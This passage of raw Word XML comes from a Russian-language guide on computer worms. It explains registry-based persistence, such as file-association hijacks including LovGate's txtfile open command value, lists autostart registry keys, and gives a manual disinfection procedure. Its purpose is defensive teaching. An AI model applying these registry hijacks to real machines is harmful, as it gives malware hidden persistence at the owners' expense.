    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="ad"/>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>%SystemDir%\wintask.exe %1 %*)</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Таким образом запуск всех ехе-файлов проходил через обращение к и</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="44"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>н</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="44"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">фицированному файлу </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="44"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">wintask.exe. </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="44"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">В результате, если файл </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="44"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">wintask.exe </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="44"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>удаля</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="44"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>л</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="44"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">ся до правки реестра, операционная система теряла возможность запускать файлы с расширением </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="44"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>.exe.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="00FF38D0" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="45"/>
        <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="44"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>HKEY_CLASSES_ROOT\txtfile\shell\open\command</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="00FF38D0" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="45"/>
        <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="44"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Например</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="44"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="44"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Email-Worm.Win32.LovGate.ad </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="44"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>изменяет</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="44"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="44"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ключ</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="44"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="44"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>системного</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="44"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="44"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>р</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="44"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>е</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="44"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>естра</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="44"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="44"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">HKCR\txtfile\shell\open\command {default}="Update_OB.exe </w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="44"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">%1", </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="44"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>таким</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="44"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="44"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>о</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="44"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>б</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="44"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>разом</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="44"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="44"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>чтобы</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="44"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="44"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>при</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="44"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="44"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>открытии</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="44"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="44"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>текстовых</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="44"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="44"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>файлов</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="44"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="44"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>получать</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="44"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="44"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>управление</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="44"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</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Кроме выше перечисленных ветвей и ключей реестра вредоносные пр</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="44"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>о</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="44"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>граммы могут вносить изменения и в другие ветки и ключи реестра, например:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="00FF38D0" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="45"/>
        <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="44"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\WOW\boot HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Drivers32 HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AeDebug</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r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="420"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Устранение последствий заражения</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В связи с тем, что черви практически не используют технологии шифров</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="44"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>а</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="44"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ния и метаморфизма для маскировки своих копий, борьба с ним вручную н</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="44"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>е</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="44"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>сколько упрощается и сводится к следующему алгоритму действий:</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lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="44"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Анализ и выявление с помощью Диспетчера задач </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="44"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Windows </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="44"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>под</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="44"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>о</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="44"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>зрительных процессов</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rPr>
        <w:t xml:space="preserve"> Анализ открытых портов с помощью команды </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="44"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Netstat</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lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="44"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Выгрузка подозрительных процессов</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rPr>
        <w:t xml:space="preserve"> Анализ реестра с помощью утилиты </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="44"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Regedit.exe </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="44"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>в выше перечи</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="44"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>с</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="44"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ленных ветках и ключах</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rPr>
        <w:t xml:space="preserve"> Восстановление и правка ключей реестра</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="45"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="180"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="44"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> Поиск инфицированных файлов по имени на основе данных анал</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="44"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>и</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="44"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>за процессов операционной системы и данных анализа реестра</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rPr>
        <w:t xml:space="preserve"> Удаления или замена инфицированных файлов</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rPr>
        <w:t xml:space="preserve"> Перегрузка системы</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Контрольный анализ процессов, ключей реестра, открытых портов. Если подозрительных процессов не обнаружено, ключи реестра не изменились, зн</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="44"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>а</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="44"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>чит, процедуру дезинфекции компьютера можно считать успешной, в проти</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="44"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>в</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="44"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ном случае алгоритм придется повторить.</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Тем не менее, учитывая тот факт, что современные черви могут испол</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="44"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ь</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="44"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">зовать технологии присущие вирусам, устанавливать </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="44"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>backdoor</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="44"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="44"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>компоненты, з</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="44"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>а</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="44"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>трудняя, тем самым, процедуру анализа и обнаружения своих файлов, для полной уверенности компьютер после дезинфекции вручную настоятельно р</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="44"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>е</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="44"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>комендуется осуществить проверку антивирусным средством. Следует также о</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="44"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>т</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="44"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>метить, что бороться вручную с вредоносными программами можно только постфактум - после того, как они поразили компьютер, в то же время использ</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="44"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
